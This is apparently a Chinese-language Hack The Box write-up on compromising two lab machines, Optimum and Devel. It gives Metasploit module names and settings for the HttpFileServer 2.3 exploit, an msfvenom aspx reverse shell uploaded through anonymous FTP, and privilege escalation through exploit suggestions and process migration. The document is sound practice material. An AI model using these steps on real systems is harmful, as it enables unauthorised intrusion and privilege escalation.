HTB靶场二合一续

目录:
0x00:靶机介绍
0x01:探测靶机
0x02:利用MSFgetshell
0x03:提权
0x04:第二个靶机
0x05:探测靶机
0x06:探访21端口
0x07:制作反弹shell
0x08:提权

0x00:靶机介绍

第一个靶机是Optimum难度还比较简单可以全程MSF操作

0x01:探测靶机

首先还是是用autorecon进行探测使用方法比较简单加个IP就行了。当出现full tcp finished的时候就可以去查看了

还是一如既往的只开了80端口。提取其中的关键字HttpFileServer 版本为2.3

emmmm由于人在中国,不可能加载的了google的ajax卒只能放弃回去提取关键字到MSF搜一下

0x02:利用MSF getshell

进入MSF输入全称没有。。。。而输入简写就有配合刚才得知的版本有现成的payload可以使用

输入以下命令即可设置好
命令: use exploit/windows/http/rejetto_hfs_exec
set RHOSTS 10.10.10.8
set SRVHOST 10.10.14.35
set LHOST 10.10.14.35
set LPORT 4444(不能跟上面的SRVPORT重合)

来手run就会自动运行当出现meterepeter的时候就代表成功了

user的flag也在当前目录下

0x03:提权

一开始我是想直接使用 local_exploit_suggester结果尝试到了第一次翻车,两个都用不了卒

只能把systeminfo下到本地然后根据里面的版本信息去网上找。。。。

找了一轮后找到一个41020的漏洞。

然而MSF没有现成的只能打开浏览器下载到kali本地

回到MSF那里使用Upload功能把payload传上去。目前只是个普通用户

然后只需要运行就可以权限提升了。

0x04:靶机介绍

这次的靶机是Devel,难点在于后期提权

0x05:探测靶机

首先还是先使用autorecon扫描波，当出现nmap-full-tcp完成的时候其实就可以停止了。也可以等它联动完gobuster扫描

这里我直接打开旁边的result查看，开了波21端口支持匿名登录。同时扫出了里面的内容。还有一个80端口

先输入波IP可以正常访问

0x06:探访21端口

这里正常登录输入Anonymous作为用户名，然后密码为空以后成功登录。浏览了波aspnet_client以后没挖掘到其它的信息。

不过发现80端口的文件似乎于21端口里面的文件一样。都可以访问。

如果21端口放置的是80端口WEB内容的话理论上来讲,我们可以上传波反弹shell。这里先测试一下,现在本地创建个1.txt,里面包含hello world

然后在21端口上用put把文件上传上去

在前端可以访问开始制作反弹shell

0x07:制作反弹shell

一开始比较头铁,直接传PHP反弹马上去结果403了。后来想一想在21端口上有个asp_client那应该是个asp的站来着应该做asp的马,这里利用msfvenom生成一个aspx的马顺便填好本地IP和要开放的端口

然后这里为了后面方便的操作。我还是决定用MSF来做。启动exploit/multi/handler模块。设置好刚才用的payload及IP和端口信息

重回ftp端口,把aspx的马放上去

前端访问10.10.10.5/makabaka.aspx。当出现meterpreter的时候就代表成功了,同时用getuid发现目前权限还比较低

0x08:提权

然后可以运行波 post/multi/recon/local_exploit_suggester来查看波本地漏洞有哪些。然而真正的折磨来了。。。。。。,这里只是简单的概括一下方法

这里如果想用提权payload的话得先用background退回去。然后选择你想要的payload(注:如果不想麻烦的调各种设置的话建议用这个)设置好session n,直接exploit就行了。这里不用担心失败

然后我们回到上个session,即得到反弹shell的session,启动波ps(查看进程),发现448进程多了点东西，来波进程注入偷渡到那里

再次进入shell模式以后输入whoami/getuid已经成功提权成功

后面就是拿flag了。

最后打波小广告欢迎大家关注我们的公众号神隐攻防实验室